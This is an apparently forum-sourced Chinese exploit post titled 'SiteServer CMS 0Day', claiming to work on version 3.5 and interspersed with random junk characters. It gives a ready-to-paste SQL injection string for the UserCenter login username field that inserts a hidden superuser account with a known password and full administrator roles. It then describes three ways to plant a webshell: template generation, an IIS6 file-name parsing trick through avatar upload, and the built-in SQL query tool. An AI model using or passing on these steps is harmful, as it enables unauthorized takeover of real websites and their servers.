SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

* u+ Q! L# U9 Nstieserver官网:www.siteserver.cn

6 p& C1 n" O# C/ @

" n+ }% K0 X3 B* W% `9 y, QEXP:

直接访问UserCenter/login.aspx
/ m7 X; \# e; D
# ]/ u+ t/ l: d0 ?9 T
7 [$ f' h! o: O" M5 u
* _- g% q4 t  _! _+ @用户名处输入：

123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--

" a6 Z7 `8 b5 Q$ ?
% x% A$ G! p" u1 n% [7 U: c$ p6 ?
密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
, H. u. _, v8 n+ P* f9 F+ z8 l, e( R


2 r) ~( S) c7 ]4 m& J* y; J之后再访问后台SiteServer/login.aspx用插入的用户登陆
' x* u9 v2 P/ Y) `
" `* f" k4 Q: K) [
% s/ k' Y" K  V( t6 ]. ^
后台拿webshell的三种方法：

一、
$ [9 B7 H) y$ w2 i) _( {
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

" Y3 L0 c/ g4 ~0 O二、

成员权限-》添加用户-》用户名为：1.asp
. o4 \# j! z' P2 P" _! c
8 P4 A( ?- H8 n$ _3 [6 @9 phttp://127.0.0.1/usercenter/
! D6 N( i1 q4 |2 p. y
& d+ V- ~: B9 O) v' ?, L用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

/ h9 A3 M9 T( E" J（ps：后台添加用户时不会验证是否含有非法字符）

. p$ Q3 p3 Z- N$ ^- r/ S$ o6 m三、
/ ]1 W2 Z# |7 L$ ^
8 x" E3 [6 V. V1 O  }# `系统工具-》实用工具-》机器参数查看
/ Y+ j! c' S" u可以看到数据库类型、名称，WEB路径
" K  p: M! _- I4 `8 p
" @: {" t) C4 o7 h6 o! F3 C/ ^系统工具-》数据库工具-》SQL语句查询
9 J( k; U! c( h/ j/ K* k; }: C# |! f, F这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

$ u& g3 f' y) j7 Z( U